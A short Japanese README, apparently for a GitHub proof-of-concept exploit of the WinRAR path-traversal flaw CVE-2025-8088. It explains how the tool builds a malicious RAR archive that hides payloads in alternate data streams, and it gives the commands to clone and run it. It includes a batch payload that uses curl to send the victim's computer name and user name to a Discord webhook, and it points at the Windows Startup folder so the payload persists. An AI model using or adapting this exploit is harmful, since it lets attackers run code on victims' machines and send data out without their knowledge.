
7.13より前のWinrar CVE脆弱性を悪用し、単一ファイル上の複数のADSストリームを使用する(カスタムPDF実装)
WinRARの脆弱性(CVE-2025-8088)に対する概念実証エクスプロイトで、バージョン7.12以下に影響します。このツールは、パス横断を伴う代替データストリーム(ADS)にペイロードを埋め込んだ悪意のあるRARアーカイブを作成し、任意のコード実行につながる可能性があります。
# Clone the repository
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088
# Install dependencies
pip install reportlab
# Run the exploit
python CVE-2025-8088.py
ペイロードを編集してDiscord webhookを呼び出す:
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
YOUR_DISCORD_WEBHOOK_URLを実際のwebhook URLに置き換えてください。
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\